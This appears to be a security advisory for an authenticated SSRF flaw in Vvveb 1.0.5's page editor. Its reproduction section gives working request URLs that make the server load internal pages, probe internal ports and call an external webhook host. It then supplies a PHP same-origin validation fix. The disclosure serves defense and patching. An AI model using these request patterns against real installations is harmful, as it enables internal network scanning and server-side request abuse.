Vvveb 1.0.5 | Authenticated SSRF port scanning as an editor
Basic Information

| Software Type | Web App |
|---|---|
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | Medium |
| CVSS Score | 5.3 |
| Affected Assets | 100+ |
| Date of Discovery | Jan 3rd, 2025 |
Description
The endpoint `/vadmin123/?module=editor/editor&name=` is used for modifying a page with a drag-and-drop editor.
The issue is that an attacker can pass an arbitrary URL in the `url` parameter, and the web app will attempt to load it. This can be used to perform Server-Side Request Forgery (SSRF), including internal port scanning.
This endpoint is accessible to “Editors” or anyone with privileges to modify posts or pages.
Reproduce
Log in as an editor and open the following endpoint:
/vadmin123/index.php?module=content/posts&type=post
Open a post of your choice in “Design” mode (the drag-and-drop editor); you should land on an endpoint like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Etiam+leo+nibh%2C+consectetur+nec+orci+et%2C+tempus+tempus+ex&url=//127.0.0.1/hello-world-4&template=content/post.html
For simplicity, I have changed the name of my post to shorten the URL. To perform SSRF, modify the URL to something like this:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/
This will open the index page of Vvveb for you. You can also open other pages like contact:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:80/page/contact
To use this for port scanning, you can simply change port 80 to a non-existent port like 9999:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:9999/
In this case, you get the following error:
Firefox Can’t Open This Page
To protect your security, 127.0.0.1 will not allow Firefox to display the page if another site has embedded it. To see this page, you need to open it in a new window.
This is expected. To confirm that internal ports can actually be scanned, start a dummy PHP server:
$ php -S 0.0.0.0:10001
Perform the connection:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//127.0.0.1:10001/
The request arrives in the PHP CLI output, and the following page loads:
The requested resource /?theme=landing&r=0.5980099159582586 was not found on this server.
In a real-world scenario, you won't have access to an internal PHP server, but you can also make the application send HTTP requests to external sites such as webhook.site:
http://127.0.0.1/vadmin123/?module=editor/editor&name=shorty&url=//webhook.site/xxxxxxxxxxxxxxxxxxxxxxx
Response on page:
This URL has no default content configured. View in Webhook.site.
To perform port scanning, keep changing the port until you identify which internal services are running and can actually see them.
Proof of Concept (PoC) Video
PoC Exploit
Mitigation
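The server-side fix is to stop treating the `url` parameter as a free-form URL: parse it, keep only the path and query, and rebuild the request against the site's own origin. The following is an added example written for this advisory; it is not Vvveb's own code or its patch. It assumes the site host, port and scheme (`$siteHost`, `$sitePort`, `$siteScheme`) are read from the application's configuration and never from the request.

```php
<?php
declare(strict_types=1);

// Added example, not Vvveb's own code or patch: keep the editor's `url`
// parameter on the site's own origin. $siteHost, $sitePort and $siteScheme are
// assumed to come from the application's configuration, never from the request.
// Returns a rebuilt same-origin URL, or null when the request must be refused.
function sameOriginEditorUrl(string $url, string $siteHost, int $sitePort = 80, string $siteScheme = 'http'): ?string
{
    $parts = parse_url($url);
    if ($parts === false) {
        return null; // unparsable input
    }

    // Only http(s) or scheme-less (relative / protocol-relative) URLs.
    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : null;
    if ($scheme !== null && $scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    // Credentials have no place in a page-preview URL.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }

    if (isset($parts['host'])) {
        // An explicit host must be the site itself ...
        if (strcasecmp($parts['host'], $siteHost) !== 0) {
            return null;
        }
        // ... on the site's own port. A URL such as "//127.0.0.1:9999/" fails
        // here even when the site host is 127.0.0.1, which is what stops the
        // port scan described above.
        if (isset($parts['port'])) {
            $port = $parts['port'];
        } elseif ($scheme !== null) {
            $port = ($scheme === 'https') ? 443 : 80;
        } else {
            $port = $sitePort; // protocol-relative URL inherits the site's port
        }
        if ($port !== $sitePort) {
            return null;
        }
    }

    // Require an absolute path and refuse backslashes, which some clients treat as '/'.
    $path = $parts['path'] ?? '/';
    if ($path === '' || $path[0] !== '/' || strpos($path, '\\') !== false) {
        return null;
    }
    $query = isset($parts['query']) ? '?' . $parts['query'] : '';

    // Rebuild the URL from trusted components; the caller's string is never
    // handed to the HTTP client as-is.
    $defaultPort = ($siteScheme === 'https') ? 443 : 80;
    $portPart = ($sitePort === $defaultPort) ? '' : ':' . $sitePort;
    return $siteScheme . '://' . $siteHost . $portPart . $path . $query;
}

// Constructed sample inputs, taken from the reproduction steps in this advisory.
$siteHost = '127.0.0.1';
foreach ([
    '/hello-world-4',
    '//127.0.0.1:80/page/contact',
    '//127.0.0.1:9999/',
    '//webhook.site/xxxxxxxxxxxxxxxxxxxxxxx',
] as $candidate) {
    $allowed = sameOriginEditorUrl($candidate, $siteHost, 80);
    printf("%-45s => %s\n", $candidate, $allowed ?? 'REFUSED');
}
```

Run against the advisory's own URLs with the site configured as `127.0.0.1:80`, the two same-origin inputs (`/hello-world-4` and `//127.0.0.1:80/page/contact`) are rebuilt as `http://127.0.0.1/...`, while `//127.0.0.1:9999/` and the webhook.site URL return null and must be refused. A host allowlist on its own would not have been enough in this setup, because the site host is the loopback address; the explicit port comparison and the rebuild from trusted components are what close the hole. If the editor ever legitimately needs to fetch external hosts, add a second control that resolves the hostname and rejects private and reserved ranges (`filter_var(..., FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)`), bearing in mind that the resolution must be the one the HTTP client actually uses, otherwise DNS rebinding can bypass the check.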
Patch
Posted on: January 10, 2025 10:59 PM